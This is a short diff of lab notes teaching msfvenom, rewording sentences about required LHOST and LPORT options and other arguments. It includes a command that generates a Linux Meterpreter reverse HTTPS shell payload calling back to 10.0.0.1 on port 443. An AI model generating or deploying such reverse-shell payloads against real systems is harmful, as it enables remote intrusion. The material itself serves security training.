vipertooth/Notes/Lab1/Readme.md

     ----  ---------------  --------  -----------
 ```

-You can see that the Basic options of LHOST and LPORT are required, to input these options you put the variables in after the the payload before the next argument.
+You can see that the Basic options of LHOST and LPORT are required, to input these options you put the variables in after the the payload, before the next argument.
 `msfvenom -p linux/x64/meterpreter_reverse_https LPORT=443 LHOST=10.0.0.1`

-After this you other options that can be important are:
+After this other important arguments are:
 ```
 --arch              # Set Architecture
 --platform          # Set Platform